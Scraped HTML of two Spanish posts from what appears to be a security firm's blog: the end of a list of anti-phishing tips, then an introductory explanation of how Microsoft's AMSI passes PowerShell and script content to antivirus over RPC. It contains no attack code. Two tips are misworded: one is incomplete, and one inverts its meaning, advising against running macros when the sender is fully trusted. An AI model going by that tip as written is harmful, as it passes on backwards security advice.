<p class="MsoNormal" style="text-align: justify;"><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">A pesar de
que todos estos consejos disminuyen exponencialmente el peligro de caer frente
a este tipo de amenazas, es fundamental tener en cuenta que el <i>phishing</i>
cada vez está refinándose más; y que el error humano siempre es un factor a
tener en cuenta en el uso de una herramienta tan extendida y usada a nivel
personal y empresarial como es el correo electrónico.<o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Tips de buenas prácticas
para no caer en el phishing:<o:p></o:p></span></p>
<p class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">1.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Revisa el email (tanto la dirección como el
domino).<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">2.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Desconfía de asuntos genéricos.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">3.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">No tengas prisa, si te meten prisa desconfía
y comprueba la situación descrita en el correo.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">4.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Revisa las faltas de ortografía y gramaticales
en el contenido del correo.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">5.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Si no esperas un fichero en un correo, no lo abras.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">6.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Si recibes adjuntos sin hacer una revisión
pormenorizada del correo.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">7.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Activa la visualización de extensiones.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">8.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Verifica con tu antivirus los adjuntos.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">9.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">No ejecutes macros si tienes plena confianza
en el adjunto y en el remitente.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">10.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;"> </span></span></span><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">No hagas click en los enlaces que veas en un
correo, puede haber sorpresas, con los acortadores emplea </span><a href="https://unshorten.me/"><i><span style="background: white; font-size: 11.5pt; line-height: 107%;">unshorten.me</span></i></a><span class="MsoHyperlink"><i><span style="background: white; font-size: 11.5pt; line-height: 107%;"> </span></i></span><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">o herramientas
similares.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">11.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">En entorno empresarial, conciencia y haz
campañas de phishing simulados.<o:p></o:p></span></span></p>
<p class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18pt;"><span style="font-family: Barlow Semi Condensed;"><!--[if !supportLists]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%; mso-bidi-font-family: Barlow; mso-fareast-font-family: Barlow;"><span style="mso-list: Ignore;">12.<span style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 7pt; font-stretch: normal; font-style: normal; font-variant: normal; font-variation-settings: normal; font-weight: normal; line-height: normal;">
</span></span></span><!--[endif]--><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Mantén tu antivirus actualizado.<o:p></o:p></span></span></p>
<p class="MsoNormal" style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">Si necesitáis cualquier
ayuda con tareas de concienciación, tienes alguna duda o quieres hacer campañas
de phishing en tu empresa no dudéis en contactar con </span><a href="http://www.zerolynx.com/"><span style="background: yellow; font-size: 11.5pt; line-height: 107%; mso-highlight: yellow;">www.zerolynx.com</span></a><span style="color: #333333; font-size: 11.5pt; line-height: 107%;">, y
sobre todo: <span style="background: white;">¡abrid bien los ojos!<o:p></o:p></span></span></span></p>
<p align="right" class="MsoNormal" style="text-align: right;"><b><i><span style="background: white; color: #333333; font-family: Barlow Semi Condensed; font-size: 11.5pt; line-height: 107%;">Fco Javier Pérez Sánchez</span></i></b><i><span style="background: white; color: #333333; font-size: 11.5pt; line-height: 107%;"><span style="font-family: Barlow Semi Condensed;">, Consultor de Ciberseguridad</span><span style="font-family: Barlow;"><o:p></o:p></span></span></i></p>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-68165682607490042162023-09-25T08:30:00.009+02:002023-11-07T13:12:59.133+01:00Introducción a AMSI <p> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1U00uKXB8La_2XIyNqf-1ocEoGUAEGoWA6fR7I6Wyr0BtH_xN75h6QQZdV6WisZCrCKblye9WvDJDM_V8QS5mWNDxqQozA8ndrfqjQNIjvOSu5hmVA2jwxEMcpOnjT3duDS0ZHEVcl2Fs98gc2KkJ55FO-A5H8osdbSdf3IQu76i0I7z3qLHiOAPRIMbs/s567/AMSI.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="237" data-original-width="567" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1U00uKXB8La_2XIyNqf-1ocEoGUAEGoWA6fR7I6Wyr0BtH_xN75h6QQZdV6WisZCrCKblye9WvDJDM_V8QS5mWNDxqQozA8ndrfqjQNIjvOSu5hmVA2jwxEMcpOnjT3duDS0ZHEVcl2Fs98gc2KkJ55FO-A5H8osdbSdf3IQu76i0I7z3qLHiOAPRIMbs/w640-h268/AMSI.png" width="640" /></a></p><span style="font-family: Barlow Semi Condensed;"><br /></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¡Muy buenas a todos! Hoy vamos a sumergirnos en el mundo del AMSI. Seguro que has oído hablar de él, pero ¿sabes realmente cómo funcionan? Bueno, ¡no te preocupes! Estamos aquí para explicarte todo lo que necesitas saber de una manera sencilla y amigable.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Imagina que estás escribiendo código y quieres que se ejecute en tu equipo. Los lenguajes interpretados, en lugar de compilar el código a código máquina antes de ejecutarlo, estos lenguajes utilizan un traductor especial llamado intérprete. Este intérprete se encarga de traducir y ejecutar las instrucciones, línea por línea, a medida que las encuentre.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Con los lenguajes interpretados, no solo puedes tener tus instrucciones en un archivo en tu disco duro, sino que también tienes la opción de pasar las instrucciones directamente al intérprete. Esto significa que el contenido no necesita tocar el disco duro en ningún momento.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ahora, hablemos de algo importante: la diferencia entre el malware en el disco y en la memoria RAM. Para los antivirus, analizar el disco duro es relativamente sencillo. Muchos antivirus leen el disco a medida que el usuario navega por las carpetas, lo que les permite realizar un análisis eficiente. Si detectan una firma asociada a un malware, saltará una notificación y el archivo malicioso será puesto en cuarentena. Sin embargo, la detección de malware que ya está inyectado en la memoria RAM es mucho más compleja por dos razones:</span></div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"> La memoria RAM es muy cambiante, lo que convierte en algo muy complejo de analizar.</span></li></ul><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez un proceso está ya en RAM, esas instrucciones están en ejecución, y en caso de ser un malware, podría haber realizado ya las acciones maliciosas, haberse migrado de proceso y borrado el rastro principal, etc.</span></li></ul><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ahora que hemos aclarado eso, déjame presentarte a nuestro protagonista de hoy: el AMSI (Antimalware Scan Interface). El AMSI nace como respuesta a la difícil tarea de analizar la memoria RAM y la necesidad de examinar las ejecuciones antes de que ocurran. Microsoft la desarrolló en forma de API, de tal manera que las soluciones de seguridad puedan llamar a las funciones implementadas.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Qué significa esto en términos más sencillos? Básicamente, proporciona una forma de capturar comandos en tiempo de ejecución, como los de PowerShell, JScript, VB/VBA y .NET. Una vez capturados, los enviará al antivirus, para que este lo analice antes de ejecutarlos. Si el antivirus determina que el comando es malicioso, el AMSI notificará a la aplicación y evitará su ejecución.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A pesar de que no todos AV/EDR utilizan AMSI como medida de protección, cada vez son más lo que la incluyen, por lo que es fundamental entender cómo funciona. Una vez sabemos el por qué existe AMSI y cuál es su cometido, es hora de entender exactamente cómo es el flujo normal de su funcionamiento.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La diferencia entre un programa y un proceso es que el programa son instrucciones para un cometido específico, y un proceso son las mismas instrucciones que tiene el programa, pero añadiéndole zonas de memoria reservadas para variables y otras necesidades.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En Windows, se utilizan las DLL (Dynamic Link Libraries) para extender la funcionalidad de un programa. Cuando un programa se carga en RAM en forma de proceso, y carga una DLL, las funcionalidades se integran directamente dentro de la zona virtual del proceso. Por ejemplo, en cuando se ejecuta PowerShell, DLLs como ntdll, kernel32 y AMSI forman parte de la memoria del proceso.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pongamos un ejemplo. Tenemos un proceso PowerShell, desde el cual se va a tratar de lanzar comandos, y en el equipo está instalado y activado Windows Defender. Vamos a explicar el flujo de comunicación en cuanto a AMSI se refiere.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Sabemos que AMSI es una librería dinámica que se carga en procesos como PowerShell, que está pensada para que actúe como intermediario entre el propio proceso y el AV/EDR.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En el momento que se introduce un comando, PowerShell, mediante el uso de funciones de la API AMSI, se comunicará con el proceso Windows Defender para enviar el contenido del comando. Windows defender lo analizará y enviará en forma de respuesta si lo que se está ejecutando es malicioso o no.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La comunicación entre el proceso que usa AMSI y Windows Defender se realiza mediante RPC. RPC es una forma que tiene Windows para comunicar varios procesos (pudiendo ser procesos que se encuentran en diferentes equipos). Básicamente, es una implementación estándar que permite comunicación por red entre procesos con la arquitectura cliente-servidor.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En resumen, AMSI como tal no es una medida de seguridad (porque no es quien analiza si hay malware o no), es un estándar mediante el cual los procesos como PowerShell envían datos al AV/EDR (mediante RPC), de tal forma que se pueda determinar si ejecutar un comando sería perjudicial para el equipo. En base a lo que devuelva la medida de seguridad en cuestión, PowerShell lo ejecutará o no.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Y por hoy ¡ya está bien!, continuaremos con AMSI en futuras entregas, dejando las RPC entre tus neuronas para que no sufran inundaciones.</span></div><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/juan-gabriel-ruiz-fern%C3%A1ndez-16b3181ba/" target="_blank">Juan Gabriel Ruiz</a>, <i>Senior Security Analyst at <a href="https://www.flu-project.com/" target="_blank">Zerolynx</a></i><a href="https://www.flu-project.com/" target="_blank"> </a>y <a href="https://www.linkedin.com/in/klego/">Justo Martín</a>, <i>Security Analyst at <a href="https://www.zerolynx.com/es/">Zerolynx</a></i>.</span></div><span style="font-family: Barlow Semi Condensed;"><br /> <br /></span><br /> </div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598